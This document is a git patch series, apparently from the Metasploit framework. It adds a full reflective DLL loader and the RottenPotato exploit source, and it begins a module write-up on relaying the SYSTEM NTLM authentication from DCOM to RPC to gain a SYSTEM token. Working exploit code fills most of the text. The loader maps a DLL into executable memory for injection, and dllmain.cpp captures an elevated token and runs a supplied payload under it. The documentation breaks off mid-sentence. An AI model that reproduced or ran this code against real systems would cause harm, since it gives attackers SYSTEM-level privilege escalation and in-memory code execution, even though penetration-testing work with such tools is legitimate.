contributors may be used to +// endorse or promote products derived from this software without specific prior written permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR +// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND +// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR +// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR +// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +// POSSIBILITY OF SUCH DAMAGE. +//===============================================================================================// +#include "ReflectiveLoader.h" +//===============================================================================================// +// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value +HINSTANCE hAppInstance = NULL; +//===============================================================================================// +#pragma intrinsic( _ReturnAddress ) +// This function can not be inlined by the compiler or we will not get the address we expect. Ideally +// this code will be compiled with the /O2 and /Ob1 switches. Bonus points if we could take advantage of +// RIP relative addressing in this instance but I dont believe we can do so with the compiler intrinsics +// available (and no inline asm available under x64). +__declspec(noinline) ULONG_PTR caller(VOID) { return (ULONG_PTR)_ReturnAddress(); } +//===============================================================================================// + +#ifdef ENABLE_OUTPUTDEBUGSTRING +#define OUTPUTDBG(str) pOutputDebug((LPCSTR)str) +#else /* ENABLE_OUTPUTDEBUGSTRING */ +#define OUTPUTDBG(str) do{}while(0) +#endif + +// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN, +// otherwise the DllMain at the end of this file will be used. + +// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR, +// otherwise it is assumed you are calling the ReflectiveLoader via a stub. + +// This is our position independent reflective DLL loader/injector +#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR +DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader(LPVOID lpParameter) +#else +DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader(VOID) +#endif +{ + // the functions we need + LOADLIBRARYA pLoadLibraryA = NULL; + GETPROCADDRESS pGetProcAddress = NULL; + VIRTUALALLOC pVirtualAlloc = NULL; + NTFLUSHINSTRUCTIONCACHE pNtFlushInstructionCache = NULL; +#ifdef ENABLE_STOPPAGING + VIRTUALLOCK pVirtualLock = NULL; +#endif +#ifdef ENABLE_OUTPUTDEBUGSTRING + OUTPUTDEBUG pOutputDebug = NULL; +#endif + + USHORT usCounter; + + // the initial location of this image in memory + ULONG_PTR uiLibraryAddress; + // the kernels base address and later this images newly loaded base address + ULONG_PTR uiBaseAddress; + + // variables for processing the kernels export table + ULONG_PTR uiAddressArray; + ULONG_PTR uiNameArray; + ULONG_PTR uiExportDir; + ULONG_PTR uiNameOrdinals; + DWORD dwHashValue; + + // variables for loading this image + ULONG_PTR uiHeaderValue; + ULONG_PTR uiValueA; + ULONG_PTR uiValueB; + ULONG_PTR uiValueC; + ULONG_PTR uiValueD; + ULONG_PTR uiValueE; + + // STEP 0: calculate our images current base address + + // we will start searching backwards from our callers return address. + uiLibraryAddress = caller(); + + // loop through memory backwards searching for our images base address + // we dont need SEH style search as we shouldnt generate any access violations with this + while (TRUE) + { + if (((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE) + { + uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; + // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'), + // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems. + if (uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024) + { + uiHeaderValue += uiLibraryAddress; + // break if we have found a valid MZ/PE header + if (((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE) + break; + } + } + uiLibraryAddress--; + } + + // STEP 1: process the kernels exports for the functions our loader needs... + + // get the Process Enviroment Block +#ifdef _WIN64 + uiBaseAddress = __readgsqword(0x60); +#else +#ifdef WIN_ARM + uiBaseAddress = *(DWORD *)((BYTE *)_MoveFromCoprocessor(15, 0, 13, 0, 2) + 0x30); +#else _WIN32 + uiBaseAddress = __readfsdword(0x30); +#endif +#endif + + // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx + uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr; + + // get the first entry of the InMemoryOrder module list + uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; + while (uiValueA) + { + // get pointer to current modules name (unicode string) + uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; + // set bCounter to the length for the loop + usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; + // clear uiValueC which will store the hash of the module name + uiValueC = 0; + + // compute the hash of the module name... + ULONG_PTR tmpValC = uiValueC; + do + { + tmpValC = ror((DWORD)tmpValC); + // normalize to uppercase if the module name is in lowercase + if (*((BYTE *)uiValueB) >= 'a') + tmpValC += *((BYTE *)uiValueB) - 0x20; + else + tmpValC += *((BYTE *)uiValueB); + uiValueB++; + } while (--usCounter); + uiValueC = tmpValC; + + // compare the hash with that of kernel32.dll + if ((DWORD)uiValueC == KERNEL32DLL_HASH) + { + // get this modules base address + uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; + + // get the VA of the modules NT Header + uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; + + // uiNameArray = the address of the modules export directory entry + uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; + + // get the VA of the export directory + uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); + + // get the VA for the array of name pointers + uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames); + + // get the VA for the array of name ordinals + uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals); + + usCounter = 3; +#ifdef ENABLE_STOPPAGING + usCounter++; +#endif +#ifdef ENABLE_OUTPUTDEBUGSTRING + usCounter++; +#endif + + // loop while we still have imports to find + while (usCounter > 0) + { + // compute the hash values for this function name + dwHashValue = _hash((char *)(uiBaseAddress + DEREF_32(uiNameArray))); + + // if we have found a function we want we get its virtual address + if (dwHashValue == LOADLIBRARYA_HASH + || dwHashValue == GETPROCADDRESS_HASH + || dwHashValue == VIRTUALALLOC_HASH +#ifdef ENABLE_STOPPAGING + || dwHashValue == VIRTUALLOCK_HASH +#endif +#ifdef ENABLE_OUTPUTDEBUGSTRING + || dwHashValue == OUTPUTDEBUG_HASH +#endif + ) + { + // get the VA for the array of addresses + uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); + + // use this functions name ordinal as an index into the array of name pointers + uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD)); + + // store this functions VA + if (dwHashValue == LOADLIBRARYA_HASH) + pLoadLibraryA = (LOADLIBRARYA)(uiBaseAddress + DEREF_32(uiAddressArray)); + else if (dwHashValue == GETPROCADDRESS_HASH) + pGetProcAddress = (GETPROCADDRESS)(uiBaseAddress + DEREF_32(uiAddressArray)); + else if (dwHashValue == VIRTUALALLOC_HASH) + pVirtualAlloc = (VIRTUALALLOC)(uiBaseAddress + DEREF_32(uiAddressArray)); +#ifdef ENABLE_STOPPAGING + else if (dwHashValue == VIRTUALLOCK_HASH) + pVirtualLock = (VIRTUALLOCK)(uiBaseAddress + DEREF_32(uiAddressArray)); +#endif +#ifdef ENABLE_OUTPUTDEBUGSTRING + else if (dwHashValue == OUTPUTDEBUG_HASH) + pOutputDebug = (OUTPUTDEBUG)(uiBaseAddress + DEREF_32(uiAddressArray)); +#endif + + // decrement our counter + usCounter--; + } + + // get the next exported function name + uiNameArray += sizeof(DWORD); + + // get the next exported function name ordinal + uiNameOrdinals += sizeof(WORD); + } + } + else if ((DWORD)uiValueC == NTDLLDLL_HASH) + { + // get this modules base address + uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; + + // get the VA of the modules NT Header + uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; + + // uiNameArray = the address of the modules export directory entry + uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; + + // get the VA of the export directory + uiExportDir = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); + + // get the VA for the array of name pointers + uiNameArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames); + + // get the VA for the array of name ordinals + uiNameOrdinals = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals); + + usCounter = 1; + + // loop while we still have imports to find + while (usCounter > 0) + { + // compute the hash values for this function name + dwHashValue = _hash((char *)(uiBaseAddress + DEREF_32(uiNameArray))); + + // if we have found a function we want we get its virtual address + if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH) + { + // get the VA for the array of addresses + uiAddressArray = (uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); + + // use this functions name ordinal as an index into the array of name pointers + uiAddressArray += (DEREF_16(uiNameOrdinals) * sizeof(DWORD)); + + // store this functions VA + if (dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH) + pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)(uiBaseAddress + DEREF_32(uiAddressArray)); + + // decrement our counter + usCounter--; + } + + // get the next exported function name + uiNameArray += sizeof(DWORD); + + // get the next exported function name ordinal + uiNameOrdinals += sizeof(WORD); + } + } + + // we stop searching when we have found everything we need. + if (pLoadLibraryA + && pGetProcAddress + && pVirtualAlloc +#ifdef ENABLE_STOPPAGING + && pVirtualLock +#endif + && pNtFlushInstructionCache +#ifdef ENABLE_OUTPUTDEBUGSTRING + && pOutputDebug +#endif + ) + break; + + // get the next entry + uiValueA = DEREF(uiValueA); + } + + // STEP 2: load our image into a new permanent location in memory... + + // get the VA of the NT Header for the PE to be loaded + uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; + + // allocate all the memory for the DLL to be loaded into. we can load at any address because we will + // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. + uiBaseAddress = (ULONG_PTR)pVirtualAlloc(NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); + +#ifdef ENABLE_STOPPAGING + // prevent our image from being swapped to the pagefile + pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage); +#endif + + // we must now copy over the headers + uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; + uiValueB = uiLibraryAddress; + uiValueC = uiBaseAddress; + + while (uiValueA--) + *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++; + + // STEP 3: load in all of our sections... + + // uiValueA = the VA of the first section + uiValueA = ((ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader); + + // itterate through all sections, loading them into memory. + uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; + while (uiValueE--) + { + // uiValueB is the VA for this section + uiValueB = (uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress); + + // uiValueC if the VA for this sections data + uiValueC = (uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData); + + // copy the section over + uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; + + while (uiValueD--) + *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++; + + // get the VA of the next section + uiValueA += sizeof(IMAGE_SECTION_HEADER); + } + + // STEP 4: process our images import table... + + // uiValueB = the address of the import directory + uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]; + + // we assume there is an import table to process + // uiValueC is the first entry in the import table + uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress); + + // iterate through all imports until a null RVA is found (Characteristics is mis-named) + while (((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics) + { + OUTPUTDBG("Loading library: "); + OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)); + OUTPUTDBG("\n"); + + // use LoadLibraryA to load the imported module into memory + uiLibraryAddress = (ULONG_PTR)pLoadLibraryA((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)); + + if (!uiLibraryAddress) + { + OUTPUTDBG("Loading library FAILED\n"); + + uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR); + continue; + } + + // uiValueD = VA of the OriginalFirstThunk + uiValueD = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk); + + // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) + uiValueA = (uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk); + + // itterate through all imported functions, importing by ordinal if no name present + while (DEREF(uiValueA)) + { + // sanity check uiValueD as some compilers only import by FirstThunk + if (uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG) + { + // get the VA of the modules NT Header + uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; + + // uiNameArray = the address of the modules export directory entry + uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; + + // get the VA of the export directory + uiExportDir = (uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress); + + // get the VA for the array of addresses + uiAddressArray = (uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions); + + // use the import ordinal (- export ordinal base) as an index into the array of addresses + uiAddressArray += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal) - ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->Base) * sizeof(DWORD)); + + // patch in the address for this imported function + DEREF(uiValueA) = (uiLibraryAddress + DEREF_32(uiAddressArray)); + } + else + { + // get the VA of this functions import by name struct + uiValueB = (uiBaseAddress + DEREF(uiValueA)); + + OUTPUTDBG("Resolving function: "); + OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name); + OUTPUTDBG("\n"); + + // use GetProcAddress and patch in the address for this imported function + DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress((HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name); + } + // get the next imported function + uiValueA += sizeof(ULONG_PTR); + if (uiValueD) + uiValueD += sizeof(ULONG_PTR); + } + + // get the next import + uiValueC += sizeof(IMAGE_IMPORT_DESCRIPTOR); + } + + // STEP 5: process all of our images relocations... + + // calculate the base address delta and perform relocations (even if we load at desired image base) + uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; + + // uiValueB = the address of the relocation directory + uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC]; + + // check if their are any relocations present + if (((PIMAGE_DATA_DIRECTORY)uiValueB)->Size) + { + uiValueE = ((PIMAGE_BASE_RELOCATION)uiValueB)->SizeOfBlock; + + // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) + uiValueC = (uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress); + + // and we itterate through all entries... + while (uiValueE && ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock) + { + // uiValueA = the VA for this relocation block + uiValueA = (uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress); + + // uiValueB = number of entries in this relocation block + uiValueB = (((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC); + + // uiValueD is now the first entry in the current relocation block + uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); + + // we itterate through all the entries in the current block... + while (uiValueB--) + { + // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. + // we dont use a switch statement to avoid the compiler building a jump table + // which would not be very position independent! + if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64) + *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; + else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW) + *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; +#ifdef WIN_ARM + // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem. + else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T) + { + register DWORD dwInstruction; + register DWORD dwAddress; + register WORD wImm; + // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word) + dwInstruction = *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD)); + // flip the words to get the instruction as expected + dwInstruction = MAKELONG(HIWORD(dwInstruction), LOWORD(dwInstruction)); + // sanity chack we are processing a MOV instruction... + if ((dwInstruction & ARM_MOV_MASK) == ARM_MOVT) + { + // pull out the encoded 16bit value (the high portion of the address-to-relocate) + wImm = (WORD)(dwInstruction & 0x000000FF); + wImm |= (WORD)((dwInstruction & 0x00007000) >> 4); + wImm |= (WORD)((dwInstruction & 0x04000000) >> 15); + wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4); + // apply the relocation to the target address + dwAddress = ((WORD)HIWORD(uiLibraryAddress) + wImm) & 0xFFFF; + // now create a new instruction with the same opcode and register param. + dwInstruction = (DWORD)(dwInstruction & ARM_MOV_MASK2); + // patch in the relocated address... + dwInstruction |= (DWORD)(dwAddress & 0x00FF); + dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4; + dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15; + dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4; + // now flip the instructions words and patch back into the code... + *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD)) = MAKELONG(HIWORD(dwInstruction), LOWORD(dwInstruction)); + } + } +#endif + else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH) + *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); + else if (((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW) + *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); + + // get the next entry in the current relocation block + uiValueD += sizeof(IMAGE_RELOC); + } + + uiValueE -= ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; + // get the next entry in the relocation directory + uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; + } + } + + // STEP 6: call our images entry point + + // uiValueA = the VA of our newly loaded DLL/EXE's entry point + uiValueA = (uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint); + + OUTPUTDBG("Flushing the instruction cache"); + // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing. + pNtFlushInstructionCache((HANDLE)-1, NULL, 0); + + // call our respective entry point, fudging our hInstance value +#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR + // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) + ((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter); +#else + // if we are injecting an DLL via a stub we call DllMain with no parameter + ((DLLMAIN)uiValueA)((HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL); +#endif + + // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed. + return uiValueA; +} +//===============================================================================================// +#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN + +// you must implement this function... +extern DWORD DLLEXPORT Init(SOCKET socket); + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) +{ + BOOL bReturnValue = TRUE; + + switch (dwReason) + { + case DLL_QUERY_HMODULE: + if (lpReserved != NULL) + *(HMODULE *)lpReserved = hAppInstance; + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +} + +#endif +//===============================================================================================// diff --git a/external/source/exploits/rottenpotato/ReflectiveLoader.h b/external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.h similarity index 100% rename from external/source/exploits/rottenpotato/ReflectiveLoader.h rename to external/source/exploits/rottenpotato/MSFRottenPotato/ReflectiveLoader.h diff --git a/external/source/exploits/rottenpotato/dllmain.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato/dllmain.cpp similarity index 95% rename from external/source/exploits/rottenpotato/dllmain.cpp rename to external/source/exploits/rottenpotato/MSFRottenPotato/dllmain.cpp index 096e188615..9168581f56 100644 --- a/external/source/exploits/rottenpotato/dllmain.cpp +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/dllmain.cpp @@ -1,79 +1,79 @@ -#include "stdafx.h" -#include "ReflectiveLoader.h" -#include "MSFRottenPotato.h" - -extern "C" HINSTANCE hAppInstance; -EXTERN_C IMAGE_DOS_HEADER __ImageBase; - -HANDLE ElevatedToken; - -VOID ExecutePayload(LPVOID lpPayload) -{ - SetThreadToken(NULL, ElevatedToken); - VOID(*lpCode)() = (VOID(*)())lpPayload; - lpCode(); -} - -int RottenPotato() -{ - CMSFRottenPotato* test = new CMSFRottenPotato(); - test->startCOMListenerThread(); - test->startRPCConnectionThread(); - test->triggerDCOM(); - int ret = 0; - while (true) { - if (test->negotiator->authResult != -1) { - /*Enable the priv if possible*/ - HANDLE hToken; - TOKEN_PRIVILEGES tkp; - - // Get a token for this process. - - if (!OpenProcessToken(GetCurrentProcess(), - TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))return 0; - - // Get the LUID for the Impersonate privilege. - int res = LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, - &tkp.Privileges[0].Luid); - - tkp.PrivilegeCount = 1; // one privilege to set - tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; - - // Get the impersonate priv for this process. - res = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); - - QuerySecurityContextToken(test->negotiator->phContext, &ElevatedToken); - - break; - } - else { - Sleep(500); - } - } - return ret; -} - - -BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) -{ - BOOL bReturnValue = TRUE; - DWORD dwResult = 0; - - switch (dwReason) - { - case DLL_QUERY_HMODULE: - if (lpReserved != NULL) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - RottenPotato(); - ExecutePayload(lpReserved); - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} +#include "stdafx.h" +#include "ReflectiveLoader.h" +#include "MSFRottenPotato.h" + +extern "C" HINSTANCE hAppInstance; +EXTERN_C IMAGE_DOS_HEADER __ImageBase; + +HANDLE ElevatedToken; + +VOID ExecutePayload(LPVOID lpPayload) +{ + SetThreadToken(NULL, ElevatedToken); + VOID(*lpCode)() = (VOID(*)())lpPayload; + lpCode(); +} + +int RottenPotato() +{ + CMSFRottenPotato* test = new CMSFRottenPotato(); + test->startCOMListenerThread(); + test->startRPCConnectionThread(); + test->triggerDCOM(); + int ret = 0; + while (true) { + if (test->negotiator->authResult != -1) { + /*Enable the priv if possible*/ + HANDLE hToken; + TOKEN_PRIVILEGES tkp; + + // Get a token for this process. + + if (!OpenProcessToken(GetCurrentProcess(), + TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))return 0; + + // Get the LUID for the Impersonate privilege. + int res = LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, + &tkp.Privileges[0].Luid); + + tkp.PrivilegeCount = 1; // one privilege to set + tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + + // Get the impersonate priv for this process. + res = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0); + + QuerySecurityContextToken(test->negotiator->phContext, &ElevatedToken); + + break; + } + else { + Sleep(500); + } + } + return ret; +} + + +BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) +{ + BOOL bReturnValue = TRUE; + DWORD dwResult = 0; + + switch (dwReason) + { + case DLL_QUERY_HMODULE: + if (lpReserved != NULL) + *(HMODULE *)lpReserved = hAppInstance; + break; + case DLL_PROCESS_ATTACH: + hAppInstance = hinstDLL; + RottenPotato(); + ExecutePayload(lpReserved); + break; + case DLL_PROCESS_DETACH: + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + break; + } + return bReturnValue; +} diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/dump.stg b/external/source/exploits/rottenpotato/MSFRottenPotato/dump.stg new file mode 100644 index 0000000000000000000000000000000000000000..1d58a19ae53bcf18855956be74d4fbab1467910e GIT binary patch literal 16384 zcmeIyu?Ye(6adgKqF|?ug_V=oxqyQxh>hbof|KY7I*7(Z5Kfy*bA{ad;m9ZXcR5~2 zu9w;EbY9%!Csr|xXPU&gF+Rw7dEPONJfBj@KYhvbkoY5kNB-Bcf1;lPo7m-ch-Iu} zoBMqn%Q3Ewd5pf!e9eo^`=X}4t){tiZM9v@_kH~?Ons980RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly&{u&Mwv6*> literal 0 HcmV?d00001 diff --git a/external/source/exploits/rottenpotato/stdafx.cpp b/external/source/exploits/rottenpotato/MSFRottenPotato/stdafx.cpp similarity index 100% rename from external/source/exploits/rottenpotato/stdafx.cpp rename to external/source/exploits/rottenpotato/MSFRottenPotato/stdafx.cpp diff --git a/external/source/exploits/rottenpotato/stdafx.h b/external/source/exploits/rottenpotato/MSFRottenPotato/stdafx.h similarity index 100% rename from external/source/exploits/rottenpotato/stdafx.h rename to external/source/exploits/rottenpotato/MSFRottenPotato/stdafx.h diff --git a/external/source/exploits/rottenpotato/targetver.h b/external/source/exploits/rottenpotato/MSFRottenPotato/targetver.h similarity index 100% rename from external/source/exploits/rottenpotato/targetver.h rename to external/source/exploits/rottenpotato/MSFRottenPotato/targetver.h From 46b45f379b801a870042fa8d20a2c884b58a13e7 Mon Sep 17 00:00:00 2001 From: Mumbai Date: Tue, 21 Aug 2018 11:27:07 -0400 Subject: [PATCH 022/192] Add documentation for MS16 Reflection DCOM->RPC --- .../exploit/windows/local/ms16_reflection.md | 55 +++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 documentation/modules/exploit/windows/local/ms16_reflection.md diff --git a/documentation/modules/exploit/windows/local/ms16_reflection.md b/documentation/modules/exploit/windows/local/ms16_reflection.md new file mode 100644 index 0000000000..2f93932baf --- /dev/null +++ b/documentation/modules/exploit/windows/local/ms16_reflection.md @@ -0,0 +1,55 @@ +## Intro + This module will abuse the SeImperonsate privilege commonly found in +services due to the requirement to impersonate a client upon +authentication. As such it is possible to impersonate the SYSTEM account +and relay its NTLM hash to RPC via DCOM. The DLL will perform a MiTM +attack at which intercepts the hash and relay responses from RPC to be +able to establish a handle to a new SYSTEM token. Some caveats : Set +your target option to match the architecture of your Meterpreter +session, else it will inject the wrong architecture DLL into the process +of a seperate architecture. Additionally, 